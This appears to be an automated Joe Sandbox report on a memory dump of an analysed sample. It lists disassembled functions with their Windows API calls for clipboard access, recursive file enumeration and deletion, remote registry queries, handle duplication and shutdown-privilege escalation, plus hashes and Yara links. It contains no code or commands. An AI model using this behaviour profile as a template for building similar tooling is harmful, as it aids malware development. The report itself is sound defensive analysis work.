                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 420908878-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 8d277a50d561e7f78c86de519bb6c0d6a446b58ce1c458e2df8726809fdc0383
                                                                                                                                                                                                                                                                                                        • Instruction ID: 637573eeb3880be3baacb310055c9cc82aa72c611817cd281596fab89e7d1903
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8d277a50d561e7f78c86de519bb6c0d6a446b58ce1c458e2df8726809fdc0383
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F261EE782042129FD310EF64D988F6ABBF4AF98354F04445CF986C7292CB3AD905CB62
                                                                                                                                                                                                                                                                                                        Function 010273D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 01027403
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 01027457
                                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 01027493
                                                                                                                                                                                                                                                                                                        • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 010274BA
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FBB329: _wcslen.LIBCMT ref: 00FBB333
                                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 010274F7
                                                                                                                                                                                                                                                                                                        • FileTimeToSystemTime.KERNEL32(?,?), ref: 01027524
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                                                        • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                                                        • Opcode ID: cfbd6bc2cd0e33ee133b4ca23773919a3306e6680b78e691ebb4a214dd333db2
                                                                                                                                                                                                                                                                                                        • Instruction ID: 6e037b8da692cbb88ef933b7987fda2a3eda53261d2be681adb7af68c499fd33
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfbd6bc2cd0e33ee133b4ca23773919a3306e6680b78e691ebb4a214dd333db2
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 63D17EB2508344AFC310EBA5CC81EAFB7ECAF98704F44091DF585D6152EB79DA48DB62
                                                                                                                                                                                                                                                                                                        Function 0102A087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0102A0A8
                                                                                                                                                                                                                                                                                                        • GetFileAttributesW.KERNEL32(?), ref: 0102A0E6
                                                                                                                                                                                                                                                                                                        • SetFileAttributesW.KERNEL32(?,?), ref: 0102A100
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0102A118
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A123
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0102A13F
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0102A18F
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(01077B94), ref: 0102A1AD
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0102A1B7
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A1C4
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A1D4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 30630829b01b17ba43f50da135d6d78e30a416f8e61739edf91d9cc62bd0759d
                                                                                                                                                                                                                                                                                                        • Instruction ID: df102f79ed5b421c4a1104aa768dce7f0e5cb51e4a235e0853794b21e078bda9
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 30630829b01b17ba43f50da135d6d78e30a416f8e61739edf91d9cc62bd0759d
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8B312B71700229ABEB219FF4DD49ADE77ED9F142B0F140096FA84D3080EF34DA448B14
                                                                                                                                                                                                                                                                                                        Function 01024763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 01024785
                                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 010247B2
                                                                                                                                                                                                                                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 010247E2
                                                                                                                                                                                                                                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 01024803
                                                                                                                                                                                                                                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 01024813
                                                                                                                                                                                                                                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 0102489A
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 010248A5
                                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 010248B0
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                                                        • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                                                        • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                                                        • Opcode ID: 328a456f27fda1b9163e7dde0705c08214e08257e966946acf8643e8e99e9045
                                                                                                                                                                                                                                                                                                        • Instruction ID: 5e7c2f0ca120c03d70e39aefb1abed28b35577882a9e3e42c4d6f2e82e85c701
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 328a456f27fda1b9163e7dde0705c08214e08257e966946acf8643e8e99e9045
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F231D0B5900259ABDB219FA4DC89FEF37BDEF89700F1040B6F649D2150EBB49244CB24
                                                                                                                                                                                                                                                                                                        Function 0102A1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,76228FB0,?,00000000), ref: 0102A203
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 0102A25E
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A269
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(*.*,?), ref: 0102A285
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0102A2D5
                                                                                                                                                                                                                                                                                                        • SetCurrentDirectoryW.KERNEL32(01077B94), ref: 0102A2F3
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0102A2FD
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A30A
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0102A31A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0101E3B4
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                                                        • String ID: *.*
                                                                                                                                                                                                                                                                                                        • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                                                        • Opcode ID: 83e7d8b51f0235d47d8cdd69e40acb43cbd7cfed55cd56c346187d7ddb299129
                                                                                                                                                                                                                                                                                                        • Instruction ID: dd90be919f51f16301a8b1a3f34c7f43b2ba6767c13f6369342d7e387d9f84e5
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83e7d8b51f0235d47d8cdd69e40acb43cbd7cfed55cd56c346187d7ddb299129
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 5F31487160022EEFDB21AFE8EC48ADE77AC9F15224F144095FA80E3580DF75DA458B14
                                                                                                                                                                                                                                                                                                        Function 0103C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0103C10E,?,?), ref: 0103D415
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D451
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4C8
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0103D3F8: _wcslen.LIBCMT ref: 0103D4FE
                                                                                                                                                                                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0103C99E
                                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0103CA09
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103CA2D
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0103CA8C
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0103CB47
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0103CBB4
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0103CC49
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0103CC9A
                                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0103CD43
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0103CDE2
                                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 0103CDEF
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 61b26a843d35af22bd722e022b0384170da2e6a65364d1d4423a21fa4afb84d6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b6b2a8701e8c35c182930f3fe6b04ba857bc74709e15e85bb75d3ef0ceb14330
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61b26a843d35af22bd722e022b0384170da2e6a65364d1d4423a21fa4afb84d6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 920262756042009FD754DF28C995E2ABBE9EF88314F08849DF48ADB262DB35ED42CF51
                                                                                                                                                                                                                                                                                                        Function 0101D921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 00FB5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FB55D1,?,?,00FF4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00FB5871
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101EAB0: GetFileAttributesW.KERNEL32(?,0101D840), ref: 0101EAB1
                                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 0101D9CD
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0101DA88
                                                                                                                                                                                                                                                                                                        • MoveFileW.KERNEL32(?,?), ref: 0101DA9B
                                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 0101DAB8
                                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 0101DAE2
                                                                                                                                                                                                                                                                                                          • Part of subcall function 0101DB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0101DAC7,?,?), ref: 0101DB5D
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000,?,?,?), ref: 0101DAFE
                                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0101DB0F
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                                        • API String ID: 1946585618-1173974218
                                                                                                                                                                                                                                                                                                        • Opcode ID: 2a722bfc4bdaa588158fdb0630383229d43460adc92597ca9d25823604ec0d79
                                                                                                                                                                                                                                                                                                        • Instruction ID: 0545d10b1682312d0c2500b4b0f4162d892383f84c9cc85e9fd7755336001d40
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2a722bfc4bdaa588158fdb0630383229d43460adc92597ca9d25823604ec0d79
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AB615A3190110EABCF01EBE5DE969EDB7B5AF14300F6040A9E482B7195DB796F09DF60
                                                                                                                                                                                                                                                                                                        Function 0102F7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 052363a09294e27c3d317221342730b1ad688211e845111c68dbce0de7d47686
                                                                                                                                                                                                                                                                                                        • Instruction ID: 44bae675b2842e22be25f9690449c71f4fb0b6da6eb962eab9a6ee247d5fd5ba
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 052363a09294e27c3d317221342730b1ad688211e845111c68dbce0de7d47686
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3441A074604622AFE320CF19D588B59BBF5FF54358F14C099E8998B762CB7AE841CB90
                                                                                                                                                                                                                                                                                                        Function 01012150 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,01011D95,?,?,00000000), ref: 01012159
                                                                                                                                                                                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,01011D95,?,?,00000000), ref: 01012160
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011D95,?,?,00000000), ref: 01012175
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,?,01011D95,?,?,00000000), ref: 0101217D
                                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,01011D95,?,?,00000000), ref: 01012180
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,01011D95,?,?,00000000), ref: 01012190
                                                                                                                                                                                                                                                                                                        • GetCurrentProcess.KERNEL32(01011D95,00000000,?,01011D95,?,?,00000000), ref: 01012198
                                                                                                                                                                                                                                                                                                        • DuplicateHandle.KERNEL32(00000000,?,01011D95,?,?,00000000), ref: 0101219B
                                                                                                                                                                                                                                                                                                        • CreateThread.KERNEL32(00000000,00000000,010121C1,00000000,00000000,00000000), ref: 010121B5
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                                        • API String ID: 1957940570-0
                                                                                                                                                                                                                                                                                                        • Opcode ID: 00f6e3343566448f8d5e859f8b4926bf8629e80a15a5b7a73f00a9f1d7a7f5b6
                                                                                                                                                                                                                                                                                                        • Instruction ID: b733390794ba8d448cf90ac7284b0de943c5d1e8c7720c3b78fb5dd5f987b340
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 00f6e3343566448f8d5e859f8b4926bf8629e80a15a5b7a73f00a9f1d7a7f5b6
                                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: E901A8B9240304BFE620ABA5DD89F6B7BACEB98711F008411FA45DB1A5CA759800CB20
                                                                                                                                                                                                                                                                                                        Function 0101F20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0101205A
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 01012087
                                                                                                                                                                                                                                                                                                          • Part of subcall function 01012010: GetLastError.KERNEL32 ref: 01012097
                                                                                                                                                                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 0101F249
                                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                                        • Source File: 0000000C.00000002.3029145392.0000000000FB1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00FB0000, based on PE: true
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029100111.0000000000FB0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.000000000104D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029206880.0000000001073000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029308973.000000000107D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        • Associated: 0000000C.00000002.3029335205.0000000001085000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_12_2_fb0000_Wb.jbxd
                                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                                                                                                                                                                        • String ID: $ $@$SeShutdownPrivilege
                                                                                                                                                                                                                                                                                                        • API String ID: 2234035333-3163812486
                                                                                                                                                                                                                                                                                                        • Opcode ID: fd208f98f89d265309bc0b47224f81363b4ceddc7bc7ba5df6cfae9be686a59f
                                                                                                                                                                                                                                                                                                        • Instruction ID: f27117d09d1b943afe33d7dcaf698d5ef3f7d725b6a677df8125193346368409
                                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd208f98f89d265309bc0b47224f81363b4ceddc7bc7ba5df6cfae9be686a59f
